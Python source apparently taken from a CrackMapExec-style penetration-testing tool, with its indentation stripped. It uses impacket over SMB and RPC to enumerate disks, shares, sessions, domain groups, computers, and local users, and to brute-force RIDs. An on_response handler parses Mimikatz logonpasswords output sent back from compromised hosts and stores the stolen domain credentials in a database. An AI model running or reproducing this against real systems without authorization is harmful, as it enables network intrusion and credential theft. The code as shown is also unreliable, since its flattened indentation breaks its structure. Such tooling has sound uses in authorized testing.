def disks1(smb):
"""Enumerate disks.
*** This does require local admin i think. Made to return nothing if not admin.
"""
self = smb
enumlog = ''
enumlog += 'Executed as {} \n'.format(self.username)
try:
#self.logger.info('Attempting to enum disks...')
rpctransport = impacket.dcerpc.v5.transport.SMBTransport(
self.host, 445, r'\srvsvc', smb_connection=self.conn)
dce = rpctransport.get_dce_rpc()
dce.connect()
try:
logging.debug('disks Binding start')
dce.bind(impacket.dcerpc.v5.srvs.MSRPC_UUID_SRVS)
try:
logging.debug('Get disks via hNetrServerDiskEnum...')
#self.logger.announce('Attempting to enum disks...')
resp = impacket.dcerpc.v5.srvs.hNetrServerDiskEnum(dce, 0)
self.logger.success('Disks enumerated on {} !'.format(
self.host))
for disk in resp['DiskInfoStruct']['Buffer']:
if disk['Disk'] != '\x00':
#self.logger.results('Disk: {} found on {}'.format(disk['Disk'], self.host))
self.logger.highlight("Found Disk: {}\\ ".format(
disk['Disk']))
enumlog += "Found Disk: {}\\ \n".format(disk['Disk'])
except Exception as e: #failed function
logging.debug('failed function {}'.format(str(e)))
self.logger.error('Failed to enum disks, are you LocalAdmin?')
dce.disconnect()
return
except Exception as e: #failed bind
logging.debug('failed bind {}'.format(str(e)))
dce.disconnect()
return
except Exception as e: #failed connect
logging.debug('failed connect {}'.format(str(e)))
dce.disconnect()
return
if self.args.logs:
ctime = datetime.now().strftime("%b.%d.%y_at_%H%M")
log_name = 'Disks_of_{}_on_{}.log'.format(self.host, ctime)
write_log(str(enumlog), log_name)
self.logger.announce("Saved Disks output to {}/{}".format(
cfg.LOGS_PATH, log_name))
#self.logger.info('Finished disk enum')
dce.disconnect()
return
def on_response(self, context, response):
response.send_response(200)
response.end_headers()
length = int(response.headers.get('Content-Length'))
data = response.rfile.read(length)
# We've received the response, stop tracking this host
response.stop_tracking_host()
if len(data):
if self.command.find('sekurlsa::logonpasswords') != -1:
creds = self.parse_mimikatz(data)
if len(creds):
for cred_set in creds:
credtype, domain, username, password, _, _ = cred_set
# Get the hostid from the DB
hostid = context.db.get_computers(
response.client_address[0])[0][0]
context.db.add_credential(credtype,
domain,
username,
password,
pillaged_from=hostid)
context.log.highlight('{}\\{}:{}'.format(
domain, username, password))
context.log.success(
"Added {} credential(s) to the database".format(
highlight(len(creds))))
else:
context.log.highlight(data)
#cant use ':' in filename cause of windows
log_name = 'Mimikatz_against_{}_on_{}.log'.format(
response.client_address[0],
datetime.now().strftime("%b.%d.%y_at_%H%M"))
write_log(str(data, 'utf-8'), log_name)
context.log.info("Saved raw Mimikatz output to {}/{}".format(
cfg.LOGS_PATH, log_name))
def group2(smb):
"""Enum a target group in domain.
Prints output and #adds them to cmxdb
"""
self = smb
targetGroup = self.args.group
groupFound = False
groupLog = ''
if targetGroup == '':
self.logger.error("Must specify a group name after --group ")
return list()
#self.logger.announce('Starting Domain Group Enum')
try:
rpctransport = impacket.dcerpc.v5.transport.SMBTransport(
self.dc_ip,
445,
r'\samr',
username=self.username,
password=self.password,
domain=self.domain)
dce = rpctransport.get_dce_rpc()
dce.connect()
try:
logging.debug('Get net groups Binding start')
dce.bind(impacket.dcerpc.v5.samr.MSRPC_UUID_SAMR)
try:
logging.debug('Connect w/ hSamrConnect...')
resp = impacket.dcerpc.v5.samr.hSamrConnect(dce)
logging.debug('Dump of hSamrConnect response:')
if self.debug:
resp.dump()
serverHandle = resp['ServerHandle']
self.logger.debug('Looking up reachable domain(s)')
resp2 = impacket.dcerpc.v5.samr.hSamrEnumerateDomainsInSamServer(
dce, serverHandle)
logging.debug(
'Dump of hSamrEnumerateDomainsInSamServer response:')
if self.debug:
resp2.dump()
domains = resp2['Buffer']['Buffer']
tmpdomain = domains[0]['Name']
logging.debug('Looking up groups in domain: ' +
domains[0]['Name'])
resp = impacket.dcerpc.v5.samr.hSamrLookupDomainInSamServer(
dce, serverHandle, domains[0]['Name'])
logging.debug('Dump of hSamrLookupDomainInSamServer response:')
if self.debug:
resp.dump()
resp = impacket.dcerpc.v5.samr.hSamrOpenDomain(
dce, serverHandle=serverHandle, domainId=resp['DomainId'])
logging.debug('Dump of hSamrOpenDomain response:')
if self.debug:
resp.dump()
domainHandle = resp['DomainHandle']
status = impacket.nt_errors.STATUS_MORE_ENTRIES
enumerationContext = 0
while status == impacket.nt_errors.STATUS_MORE_ENTRIES:
try:
resp = impacket.dcerpc.v5.samr.hSamrEnumerateGroupsInDomain(
dce,
domainHandle,
enumerationContext=enumerationContext)
logging.debug(
'Dump of hSamrEnumerateGroupsInDomain response:')
if self.debug:
resp.dump()
except impacket.dcerpc.v5.rpcrt.DCERPCException as e:
if str(e).find('STATUS_MORE_ENTRIES') < 0:
raise
resp = e.get_packet()
for group in resp['Buffer']['Buffer']:
gid = group['RelativeId']
r = impacket.dcerpc.v5.samr.hSamrOpenGroup(
dce, domainHandle, groupId=gid)
logging.debug('Dump of hSamrOpenUser response:')
if self.debug:
r.dump()
info = impacket.dcerpc.v5.samr.hSamrQueryInformationGroup(
dce, r['GroupHandle'], impacket.dcerpc.v5.samr.
GROUP_INFORMATION_CLASS.GroupGeneralInformation)
#info response object (SAMPR_GROUP_GENERAL_INFORMATION) defined in impacket/samr.py # 2.2.5.7 SAMPR_GROUP_INFO_BUFFER
logging.debug(
'Dump of hSamrQueryInformationGroup response:')
if self.debug:
info.dump()
if group['Name'] == targetGroup:
self.logger.success(
'\"{}\" Domain Group Found in {}'.format(
targetGroup, tmpdomain))
self.logger.highlight(
" \"{}\" Group Info".format(targetGroup))
groupFound = True
self.logger.highlight('Member Count: {}'.format(
info['Buffer']['General']['MemberCount']))
groupResp = impacket.dcerpc.v5.samr.hSamrGetMembersInGroup(
dce, r['GroupHandle'])
logging.debug(
'Dump of hSamrGetMembersInGroup response:')
if self.debug:
groupResp.dump()
for member in groupResp['Members']['Members']:
m = impacket.dcerpc.v5.samr.hSamrOpenUser(
dce, domainHandle,
impacket.dcerpc.v5.samr.MAXIMUM_ALLOWED,
member)
guser = impacket.dcerpc.v5.samr.hSamrQueryInformationUser2(
dce, m['UserHandle'],
impacket.dcerpc.v5.samr.
USER_INFORMATION_CLASS.UserAllInformation)
self.logger.highlight('{}\\{:<30} '.format(
tmpdomain,
guser['Buffer']['All']['UserName']))
groupLog += '{}\\{:<30} \n'.format(
tmpdomain,
guser['Buffer']['All']['UserName'])
logging.debug(
'Dump of hSamrQueryInformationUser2 response:'
)
if self.debug:
guser.dump()
if groupFound is False:
self.logger.error("Specified group was not found")
impacket.dcerpc.v5.samr.hSamrCloseHandle(
dce, r['GroupHandle'])
enumerationContext = resp['EnumerationContext']
status = resp['ErrorCode']
except Exception as e: #failed function
logging.debug('failed function {}'.format(str(e)))
self.logger.error('Failed to enum Domain Groups')
dce.disconnect()
return
except Exception as e: #failed bind
logging.debug('failed bind {}'.format(str(e)))
dce.disconnect()
return
except Exception as e: #failed connect
logging.debug('failed connect in group2.a {}'.format(str(e)))
self.logger.error(
'Failed to identify the domain controller for {} Can you ping it?'.
format(self.domain))
self.logger.error(
' Try adding the switch -dc ip.ad.dr.es with a known DC')
self.logger.error(
' or ensure your /etc/resolv.conf file includes target DC(s)')
try:
dce.disconnect()
except:
logging.debug('failed disconnect in group2.a')
pass
return
try:
dce.disconnect()
except:
self.logging.error('Failed dce disconnect during groups')
pass
if self.args.logs and groupFound:
ctime = datetime.now().strftime("%b.%d.%y_at_%H%M")
log_name = 'Members_of_{}_on_{}.log'.format(targetGroup, ctime)
write_log(str(groupLog), log_name)
self.logger.announce("Saved Group Members output to {}/{}".format(
cfg.LOGS_PATH, log_name))
#self.logger.announce('Finished Group Enum')
return
def computers1(smb):
"""Enum Domain Computers.
Prints output and adds them to cmxdb
"""
comps = ''
self = smb
#self.logger.announce('Starting Domain Computers Enum')
if self.args.save:
filename = "{}-computers.txt".format(self.domain)
savefile = open(filename, "w")
try:
rpctransport = impacket.dcerpc.v5.transport.SMBTransport(
self.dc_ip,
445,
r'\samr',
username=self.username,
password=self.password) #domain=self.domain
dce = rpctransport.get_dce_rpc()
dce.connect()
try:
logging.debug('NetUsers Binding start')
dce.bind(impacket.dcerpc.v5.samr.MSRPC_UUID_SAMR)
try:
logging.debug('Connect w/ hSamrConnect...')
resp = impacket.dcerpc.v5.samr.hSamrConnect(dce)
logging.debug('Dump of hSamrConnect response:')
if self.debug:
resp.dump()
serverHandle = resp['ServerHandle']
self.logger.debug('Looking up domain name(s)')
resp2 = impacket.dcerpc.v5.samr.hSamrEnumerateDomainsInSamServer(
dce, serverHandle)
logging.debug(
'Dump of hSamrEnumerateDomainsInSamServer response:')
if self.debug:
resp2.dump()
domains = resp2['Buffer']['Buffer']
tmpdomain = domains[0]['Name']
self.logger.debug('Looking up users in domain:' +
domains[0]['Name'])
resp = impacket.dcerpc.v5.samr.hSamrLookupDomainInSamServer(
dce, serverHandle, domains[0]['Name'])
logging.debug('Dump of hSamrLookupDomainInSamServer response:')
if self.debug:
resp.dump()
resp = impacket.dcerpc.v5.samr.hSamrOpenDomain(
dce, serverHandle=serverHandle, domainId=resp['DomainId'])
logging.debug('Dump of hSamrOpenDomain response:')
if self.debug:
resp.dump()
domainHandle = resp['DomainHandle']
status = impacket.nt_errors.STATUS_MORE_ENTRIES
enumerationContext = 0
while status == impacket.nt_errors.STATUS_MORE_ENTRIES:
try:
#need one for workstations and second gets the DomainControllers
respComps = impacket.dcerpc.v5.samr.hSamrEnumerateUsersInDomain(
dce,
domainHandle,
impacket.dcerpc.v5.samr.
USER_WORKSTATION_TRUST_ACCOUNT,
enumerationContext=enumerationContext)
respServs = impacket.dcerpc.v5.samr.hSamrEnumerateUsersInDomain(
dce,
domainHandle,
impacket.dcerpc.v5.samr.USER_SERVER_TRUST_ACCOUNT,
enumerationContext=enumerationContext)
logging.debug(
'Dump of hSamrEnumerateUsersInDomain Comps response:'
)
if self.debug:
respComps.dump()
logging.debug(
'Dump of hSamrEnumerateUsersInDomain Servs response:'
)
if self.debug:
respServs.dump()
except impacket.dcerpc.v5.rpcrt.DCERPCException as e:
if str(e).find('STATUS_MORE_ENTRIES') < 0:
raise
resp = e.get_packet()
self.logger.success('Domain Controllers enumerated')
self.logger.highlight(
" {} Domain Controllers".format(tmpdomain))
comps += 'Domain Controllers \n'
for user in respServs['Buffer']['Buffer']:
#servers
r = impacket.dcerpc.v5.samr.hSamrOpenUser(
dce, domainHandle,
impacket.dcerpc.v5.samr.MAXIMUM_ALLOWED,
user['RelativeId'])
logging.debug('Dump of hSamrOpenUser response:')
if self.debug:
r.dump()
# r has the clases defined here:
#https://github.com/SecureAuthCorp/impacket/impacket/dcerpc/v5/samr.py #2.2.7.29 SAMPR_USER_INFO_BUFFER
self.logger.highlight('{:<23} rid: {}'.format(
user['Name'], user['RelativeId']))
comps += '{:<23} rid: {} \n'.format(
user['Name'], user['RelativeId'])
#def add_computer(self, ip='', hostname='', domain=None, os='', dc='No'):
self.db.add_computer(hostname=user['Name'][:-1],
domain=tmpdomain,
dc='Yes')
if self.args.save:
savefile.write("{}\n".format(user['Name']))
info = impacket.dcerpc.v5.samr.hSamrQueryInformationUser2(
dce, r['UserHandle'], impacket.dcerpc.v5.samr.
USER_INFORMATION_CLASS.UserAllInformation)
logging.debug(
'Dump of hSamrQueryInformationUser2 response:')
if self.debug:
info.dump()
impacket.dcerpc.v5.samr.hSamrCloseHandle(
dce, r['UserHandle'])
print('')
self.logger.success('Domain Computers enumerated')
self.logger.highlight(
" {} Domain Computer Accounts".format(tmpdomain))
comps += '\nDomain Computers \n'
for user in respComps['Buffer']['Buffer']:
#workstations
r = impacket.dcerpc.v5.samr.hSamrOpenUser(
dce, domainHandle,
impacket.dcerpc.v5.samr.MAXIMUM_ALLOWED,
user['RelativeId'])
logging.debug('Dump of hSamrOpenUser response:')
if self.debug:
r.dump()
# r has the clases defined here:
#https://github.com/SecureAuthCorp/impacket/impacket/dcerpc/v5/samr.py #2.2.7.29 SAMPR_USER_INFO_BUFFER
#self.logger.results('Computername: {:<25} rid: {}'.format(user['Name'], user['RelativeId']))
self.logger.highlight('{:<23} rid: {}'.format(
user['Name'], user['RelativeId']))
comps += '{:<23} rid: {}\n'.format(
user['Name'], user['RelativeId'])
#def add_computer(self, ip='', hostname='', domain=None, os='', dc='No'):
self.db.add_computer(hostname=user['Name'][:-1],
domain=tmpdomain)
if self.args.save:
savefile.write("{}\n".format(user['Name']))
info = impacket.dcerpc.v5.samr.hSamrQueryInformationUser2(
dce, r['UserHandle'], impacket.dcerpc.v5.samr.
USER_INFORMATION_CLASS.UserAllInformation)
logging.debug(
'Dump of hSamrQueryInformationUser2 response:')
if self.debug:
info.dump()
impacket.dcerpc.v5.samr.hSamrCloseHandle(
dce, r['UserHandle'])
enumerationContext = respComps['EnumerationContext']
status = respComps['ErrorCode']
except Exception as e: #failed function
logging.debug('failed function {}'.format(str(e)))
self.logger.error('Failed to enum Domain Computers')
dce.disconnect()
return
except Exception as e: #failed bind
logging.debug('failed bind {}'.format(str(e)))
dce.disconnect()
return
except Exception as e: #failed connect
logging.debug('failed connect in computers1.a {}'.format(str(e)))
self.logger.error(
'Failed to identify the domain controller for {} Can you ping it?'.
format(self.domain))
self.logger.error(
' Try adding the switch -dc ip.ad.dr.es with a known DC')
self.logger.error(
' or ensure your /etc/resolv.conf file includes target DC(s)')
try:
dce.disconnect()
except:
logging.debug('failed disconnect in computers')
pass
return
if self.args.save:
savefile.close()
self.logger.success("Computers saved to: {}".format(filename))
try:
dce.disconnect()
except:
self.logging.error('Failed dce disconnect during computers')
pass
if self.args.logs:
ctime = datetime.now().strftime("%b.%d.%y_at_%H%M")
log_name = 'Domain_Computers_of_{}_on_{}.log'.format(tmpdomain, ctime)
write_log(str(comps), log_name)
self.logger.announce("Saved Domain Computers output to {}/{}".format(
cfg.LOGS_PATH, log_name))
#self.logger.announce('Finished Domain Computer Enum')
return
def sessions1(smb):
"""Enumerate sessions.
Identifes sessions and their originating host.
Using impackets hNetrSessionEnum from https://github.com/SecureAuthCorp/impacket/blob/ec9d119d102251d13e2f9b4ff25966220f4005e9/impacket/dcerpc/v5/srvs.py
"""
self = smb
enumlog = ''
enumlog += 'Executed as {} \n'.format(self.username)
try:
#self.logger.announce('Starting Session Enum')
rpctransport = impacket.dcerpc.v5.transport.SMBTransport(
self.host, 445, r'\srvsvc', smb_connection=self.conn)
dce = rpctransport.get_dce_rpc()
dce.connect()
try:
logging.debug('netsessions Binding start')
dce.bind(impacket.dcerpc.v5.srvs.MSRPC_UUID_SRVS)
try:
logging.debug('Get netsessions via hNetrSessionEnum...')
resp = impacket.dcerpc.v5.srvs.hNetrSessionEnum(
dce, '\x00', '\x00', 10
) #no clue why \x00 is used for client and username?? but it works!
for session in resp['InfoStruct']['SessionInfo']['Level10'][
'Buffer']:
userName = session['sesi10_username'][:-1]
sourceIP = session['sesi10_cname'][:-1][2:]
#self.logger.results('User: {} has session originating from {}'.format(userName, sourceIP))
self.logger.highlight(
"{} has session originating from {} on {}".format(
userName,
sourceIP,
self.host,
))
enumlog += "{} has session originating from {} on {} \n".format(
userName,
sourceIP,
self.host,
)
self.logger.success('Sessions enumerated on {} !'.format(
self.host))
except Exception as e: #failed function
logging.debug('failed function {}'.format(str(e)))
self.logger.error(
'Failed to enum Sessions, win10 may require LocalAdmin')
dce.disconnect()
return
except Exception as e: #failed bind
logging.debug('failed bind {}'.format(str(e)))
self.logger.error(
'Failed to enum Sessions, win10 may require LocalAdmin')
dce.disconnect()
return
except Exception as e: #failed connect
logging.debug('failed connect {}'.format(str(e)))
self.logger.error(
'Failed to enum Sessions, win10 may require LocalAdmin')
dce.disconnect()
return
if self.args.logs:
ctime = datetime.now().strftime("%b.%d.%y_at_%H%M")
log_name = 'Sessions_of_{}_on_{}.log'.format(self.host, ctime)
write_log(str(enumlog), log_name)
self.logger.announce("Sessions output saved to {}/{}".format(
cfg.LOGS_PATH, log_name))
#self.logger.announce('Finished Session Enum')
dce.disconnect()
return
def shares1(smb):
"""Enum accessable shares and privileges.
OpSec Warning, this attempts to create a randomly named folder on each enumerated share
to check for WRITE access.
"""
self = smb
temp_dir = ntpath.normpath("\\" + gen_random_string())
permissions = []
#self.logger.announce('Starting Share Enumeration')
enumlog = ''
try:
for share in self.conn.listShares():
share_name = share['shi1_netname'][:-1]
share_remark = share['shi1_remark'][:-1]
share_info = {
'name': share_name,
'remark': share_remark,
'access': []
}
read = False
write = False
try:
self.conn.listPath(share_name, '\\')
read = True
share_info['access'].append('READ')
except SessionError:
pass
try:
self.conn.createDirectory(share_name, temp_dir)
self.conn.deleteDirectory(share_name, temp_dir)
write = True
share_info['access'].append('WRITE')
except SessionError:
pass
permissions.append(share_info)
#self.db.add_share(hostid, share_name, share_remark, read, write)
#self.logger.debug('Enumerated shares')
self.logger.success('Shares enumerated on: {}'.format(self.host))
self.logger.highlight('{:<15} {:<15} {}'.format(
'Share', 'Permissions', 'Remark'))
self.logger.highlight('{:<15} {:<15} {}'.format(
'-----', '-----------', '------'))
enumlog += 'Executed as {} \n'.format(self.username)
enumlog += '{:<15} {:<15} {} \n'.format('Share', 'Permissions',
'Remark')
enumlog += '{:<15} {:<15} {} \n'.format('-----', '-----------',
'------')
for share in permissions:
name = share['name']
remark = share['remark']
perms = share['access']
self.logger.highlight('{:<15} {:<15} {}'.format(
name, ','.join(perms), remark))
enumlog += '{:<15} {:<15} {} \n'.format(name, ','.join(perms),
remark)
except Exception as e:
self.logger.error('Error enumerating shares: {}'.format(e))
if self.args.logs:
ctime = datetime.now().strftime("%b.%d.%y_at_%H%M")
log_name = 'Shares_of_{}_on_{}.log'.format(self.host, ctime)
write_log(str(enumlog), log_name)
self.logger.announce("Saved Shares output to {}/{}".format(
cfg.LOGS_PATH, log_name))
#self.logger.announce('Finished Share Enumeration')
return permissions
def rid_brute1(smb, maxrid=None):
"""Brute force RIDs."""
self = smb
enumlog = ''
enumlog += 'Executed as {} \n'.format(self.username)
logging.debug('Starting RID Brute')
if not maxrid:
maxrid = int(self.args.rid_brute)
try:
rpctransport = impacket.dcerpc.v5.transport.SMBTransport(
self.host,
445,
r'\lsarpc',
username=self.username,
password=self.password,
smb_connection=self.conn)
dce = rpctransport.get_dce_rpc()
dce.connect()
try:
logging.debug('Brute forcing RIDs')
dce.bind(impacket.dcerpc.v5.lsat.MSRPC_UUID_LSAT)
try:
logging.debug('Open w/ hLsarOpenPolicy2...')
resp = impacket.dcerpc.v5.lsad.hLsarOpenPolicy2(
dce, impacket.dcerpc.v5.dtypes.MAXIMUM_ALLOWED
| impacket.dcerpc.v5.lsat.POLICY_LOOKUP_NAMES)
policyHandle = resp['PolicyHandle']
if self.debug:
logging.debug('Dump of hLsarOpenPolicy2 response:')
resp.dump()
resp = impacket.dcerpc.v5.lsad.hLsarQueryInformationPolicy2(
dce, policyHandle, impacket.dcerpc.v5.lsad.
POLICY_INFORMATION_CLASS.PolicyAccountDomainInformation)
domainSid = resp['PolicyInformation'][
'PolicyAccountDomainInfo']['DomainSid'].formatCanonical()
if self.debug:
logging.debug(
'Dump of hLsarQueryInformationPolicy2 response:')
resp.dump()
soFar = 0
SIMULTANEOUS = 1000
self.logger.success("RID's enumerated on: {}".format(
self.host))
self.logger.highlight(" RID Information")
for j in range(maxrid // SIMULTANEOUS + 1):
if (maxrid - soFar) // SIMULTANEOUS == 0:
sidsToCheck = (maxrid - soFar) % SIMULTANEOUS
else:
sidsToCheck = SIMULTANEOUS
if sidsToCheck == 0:
break
sids = list()
for i in range(soFar, soFar + sidsToCheck):
sids.append(domainSid + '-%d' % i)
try:
#if self.debug: # this is huge/gross, even for debug
# logging.debug('Dump of hLsarLookupSids response:')
# resp.dump()
resp = impacket.dcerpc.v5.lsat.hLsarLookupSids(
dce, policyHandle, sids, impacket.dcerpc.v5.lsat.
LSAP_LOOKUP_LEVEL.LsapLookupWksta)
except Exception as e:
if str(e).find('STATUS_NONE_MAPPED') >= 0:
soFar += SIMULTANEOUS
continue
elif str(e).find('STATUS_SOME_NOT_MAPPED') >= 0:
resp = e.get_packet()
else:
raise
for n, item in enumerate(resp['TranslatedNames']['Names']):
if item['Use'] != impacket.dcerpc.v5.samr.SID_NAME_USE.SidTypeUnknown:
rid = soFar + n
domain = resp['ReferencedDomains']['Domains'][
item['DomainIndex']]['Name']
user = item['Name']
sid_type = impacket.dcerpc.v5.samr.SID_NAME_USE.enumItems(
item['Use']).name
self.logger.highlight("{}\\{:<15} :{} ({})".format(
domain, user, rid, sid_type))
enumlog += "{}\\{:<15} :{} ({}) \n".format(
domain, user, rid, sid_type)
soFar += SIMULTANEOUS
except Exception as e: #failed function
logging.debug('failed function {}'.format(str(e)))
self.logger.error(
'Failed to Brute force RIDs, are you localadmin?')
dce.disconnect()
return
except Exception as e: #failed bind
logging.debug('failed bind {}'.format(str(e)))
dce.disconnect()
return
except Exception as e: #failed connect
logging.debug('failed connect {}'.format(str(e)))
dce.disconnect()
return
if self.args.logs:
ctime = datetime.now().strftime("%b.%d.%y_at_%H%M")
log_name = 'RID-Brute_of_{}_on_{}.log'.format(self.host, ctime)
write_log(str(enumlog), log_name)
self.logger.announce("Saved RID Brute output to {}/{}".format(
cfg.LOGS_PATH, log_name))
dce.disconnect()
logging.debug('Finished RID brute')
return
def local_groups1(smb):
"""Enumerate local groups.
Need to figure out if needs localadmin or its a waste of effort
"""
self = smb
enumlog = ''
enumlog += 'Executed as {} \n'.format(self.username)
try:
#self.logger.announce('Checking Local Groups')
rpctransport = impacket.dcerpc.v5.transport.SMBTransport(
self.host,
445,
r'\samr',
username=self.username,
password=self.password,
smb_connection=self.conn)
dce = rpctransport.get_dce_rpc()
dce.connect()
try:
logging.debug('Get net localgroups Binding start')
dce.bind(impacket.dcerpc.v5.samr.MSRPC_UUID_SAMR)
try:
logging.debug('Connect w/ hSamrConnect...')
resp = impacket.dcerpc.v5.samr.hSamrConnect(dce)
logging.debug('Dump of hSamrConnect response:')
if self.debug:
resp.dump()
serverHandle = resp['ServerHandle']
self.logger.debug('Checking host name')
resp2 = impacket.dcerpc.v5.samr.hSamrEnumerateDomainsInSamServer(
dce, serverHandle)
logging.debug(
'Dump of hSamrEnumerateDomainsInSamServer response:')
if self.debug:
resp2.dump()
domains = resp2['Buffer']['Buffer']
tmpdomain = domains[0]['Name']
resp = impacket.dcerpc.v5.samr.hSamrLookupDomainInSamServer(
dce, serverHandle, domains[0]['Name'])
logging.debug('Dump of hSamrLookupDomainInSamServer response:')
if self.debug:
resp.dump()
resp = impacket.dcerpc.v5.samr.hSamrOpenDomain(
dce, serverHandle=serverHandle, domainId=resp['DomainId'])
logging.debug('Dump of hSamrOpenDomain response:')
if self.debug:
resp.dump()
domainHandle = resp['DomainHandle']
status = impacket.nt_errors.STATUS_MORE_ENTRIES
enumerationContext = 0
self.logger.success('Local Groups enumerated on: {}'.format(
self.host))
self.logger.highlight(" Local Group Accounts")
while status == impacket.nt_errors.STATUS_MORE_ENTRIES:
try:
resp = impacket.dcerpc.v5.samr.hSamrEnumerateGroupsInDomain(
dce,
domainHandle,
enumerationContext=enumerationContext)
logging.debug(
'Dump of hSamrEnumerateGroupsInDomain response:')
if self.debug:
resp.dump()
except impacket.dcerpc.v5.rpcrt.DCERPCException as e:
if str(e).find('STATUS_MORE_ENTRIES') < 0:
raise
resp = e.get_packet()
for group in resp['Buffer']['Buffer']:
gid = group['RelativeId']
r = impacket.dcerpc.v5.samr.hSamrOpenGroup(
dce, domainHandle, groupId=gid)
logging.debug('Dump of hSamrOpenUser response:')
if self.debug:
r.dump()
info = impacket.dcerpc.v5.samr.hSamrQueryInformationGroup(
dce, r['GroupHandle'], impacket.dcerpc.v5.samr.
GROUP_INFORMATION_CLASS.GroupGeneralInformation)
#info response object (SAMPR_GROUP_GENERAL_INFORMATION) defined in impacket/samr.py # 2.2.5.7 SAMPR_GROUP_INFO_BUFFER
logging.debug(
'Dump of hSamrQueryInformationGroup response:')
if self.debug:
info.dump()
#self.logger.results('Groupname: {:<30} membercount: {}'.format(group['Name'], info['Buffer']['General']['MemberCount']))
self.logger.highlight(
'Group: {:<20} membercount: {}'.format(
group['Name'],
info['Buffer']['General']['MemberCount']))
enumlog += 'Group: {:<20} membercount: {} \n'.format(
group['Name'],
info['Buffer']['General']['MemberCount'])
groupResp = impacket.dcerpc.v5.samr.hSamrGetMembersInGroup(
dce, r['GroupHandle'])
logging.debug(
'Dump of hSamrGetMembersInGroup response:')
if self.debug:
groupResp.dump()
for member in groupResp['Members']['Members']:
m = impacket.dcerpc.v5.samr.hSamrOpenUser(
dce, domainHandle,
impacket.dcerpc.v5.samr.MAXIMUM_ALLOWED,
member)
guser = impacket.dcerpc.v5.samr.hSamrQueryInformationUser2(
dce, m['UserHandle'], impacket.dcerpc.v5.samr.
USER_INFORMATION_CLASS.UserAllInformation)
self.logger.highlight('{}\\{:<30} '.format(
tmpdomain, guser['Buffer']['All']['UserName']))
enumlog += '{}\\{:<30} \n'.format(
tmpdomain, guser['Buffer']['All']['UserName'])
logging.debug(
'Dump of hSamrQueryInformationUser2 response:')
if self.debug:
guser.dump()
impacket.dcerpc.v5.samr.hSamrCloseHandle(
dce, r['GroupHandle'])
enumerationContext = resp['EnumerationContext']
status = resp['ErrorCode']
except Exception as e: #failed function
logging.debug('failed function {}'.format(str(e)))
self.logger.error(
'Failed to enum Local Groups, are you localadmin?')
dce.disconnect()
return
except Exception as e: #failed bind
logging.debug('failed bind {}'.format(str(e)))
dce.disconnect()
return
except Exception as e: #failed connect
logging.debug('failed connect {}'.format(str(e)))
dce.disconnect()
return
if self.args.logs:
ctime = datetime.now().strftime("%b.%d.%y_at_%H%M")
log_name = 'Local-Groups_of_{}_on_{}.log'.format(self.host, ctime)
write_log(str(enumlog), log_name)
self.logger.announce("Saved Local Groups output to {}/{}".format(
cfg.LOGS_PATH, log_name))
#self.logger.announce('Finished Checking Local Groups')
dce.disconnect()
return
def local_users1(smb):
"""Enumerate local users.
Need to figure out if needs localadmin or its a waste of effort
"""
self = smb
enumlog = ''
enumlog += 'Executed as {} \n'.format(self.username)
try:
#self.logger.announce('Checking Local Users')
rpctransport = impacket.dcerpc.v5.transport.SMBTransport(
self.host,
445,
r'\samr',
username=self.username,
password=self.password,
smb_connection=self.conn)
dce = rpctransport.get_dce_rpc()
dce.connect()
try:
logging.debug('net local users Binding start')
dce.bind(impacket.dcerpc.v5.samr.MSRPC_UUID_SAMR)
try:
logging.debug('Connect w/ hSamrConnect...')
resp = impacket.dcerpc.v5.samr.hSamrConnect(dce)
logging.debug('Dump of hSamrConnect response:')
if self.debug:
resp.dump()
self.logger.debug('Looking up host name')
serverHandle = resp['ServerHandle']
resp2 = impacket.dcerpc.v5.samr.hSamrEnumerateDomainsInSamServer(
dce, serverHandle)
logging.debug(
'Dump of hSamrEnumerateDomainsInSamServer response:')
if self.debug:
resp2.dump()
domains = resp2['Buffer']['Buffer']
logging.debug('Looking up localusers on: ' +
domains[0]['Name'])
resp = impacket.dcerpc.v5.samr.hSamrLookupDomainInSamServer(
dce, serverHandle, domains[0]['Name'])
logging.debug('Dump of hSamrLookupDomainInSamServer response:')
if self.debug:
resp.dump()
resp = impacket.dcerpc.v5.samr.hSamrOpenDomain(
dce, serverHandle=serverHandle, domainId=resp['DomainId'])
logging.debug('Dump of hSamrOpenDomain response:')
if self.debug:
resp.dump()
domainHandle = resp['DomainHandle']
status = impacket.nt_errors.STATUS_MORE_ENTRIES
enumerationContext = 0
self.logger.success('Local Users enumerated on {} !'.format(
self.host))
self.logger.highlight(" Local User Accounts")
while status == impacket.nt_errors.STATUS_MORE_ENTRIES:
try:
resp = impacket.dcerpc.v5.samr.hSamrEnumerateUsersInDomain(
dce,
domainHandle,
enumerationContext=enumerationContext)
logging.debug(
'Dump of hSamrEnumerateUsersInDomain response:')
if self.debug:
resp.dump()
except impacket.dcerpc.v5.rpcrt.DCERPCException as e:
if str(e).find('STATUS_MORE_ENTRIES') < 0:
raise
resp = e.get_packet()
for user in resp['Buffer']['Buffer']:
#users
r = impacket.dcerpc.v5.samr.hSamrOpenUser(
dce, domainHandle,
impacket.dcerpc.v5.samr.MAXIMUM_ALLOWED,
user['RelativeId'])
logging.debug('Dump of hSamrOpenUser response:')
if self.debug:
r.dump()
# r has the clases defined here:
#https://github.com/SecureAuthCorp/impacket/impacket/dcerpc/v5/samr.py #2.2.7.29 SAMPR_USER_INFO_BUFFER
#self.logger.results('username: {:<25} rid: {}'.format(user['Name'], user['RelativeId']))
self.logger.highlight("{}\\{:<15} :{} ".format(
self.hostname, user['Name'], user['RelativeId']))
self.db.add_user(self.hostname, user['Name'])
enumlog += "{}\\{:<15} :{} \n".format(
self.hostname, user['Name'], user['RelativeId'])
info = impacket.dcerpc.v5.samr.hSamrQueryInformationUser2(
dce, r['UserHandle'], impacket.dcerpc.v5.samr.
USER_INFORMATION_CLASS.UserAllInformation)
logging.debug(
'Dump of hSamrQueryInformationUser2 response:')
if self.debug:
info.dump()
impacket.dcerpc.v5.samr.hSamrCloseHandle(
dce, r['UserHandle'])
enumerationContext = resp['EnumerationContext']
status = resp['ErrorCode']
except Exception as e: #failed function
logging.debug('failed function {}'.format(str(e)))
self.logger.error(
'Failed to enum Local Users, are you localadmin?')
dce.disconnect()
return
except Exception as e: #failed bind
logging.debug('failed bind {}'.format(str(e)))
dce.disconnect()
return
except Exception as e: #failed connect
logging.debug('failed connect {}'.format(str(e)))
dce.disconnect()
return
if self.args.logs:
ctime = datetime.now().strftime("%b.%d.%y_at_%H%M")
log_name = 'Local-Users_of_{}_on_{}.log'.format(self.host, ctime)
write_log(str(enumlog), log_name)
self.logger.announce("Saved Local Users output to {}/{}".format(
cfg.LOGS_PATH, log_name))
#self.logger.announce('Finished Checking Local Users')
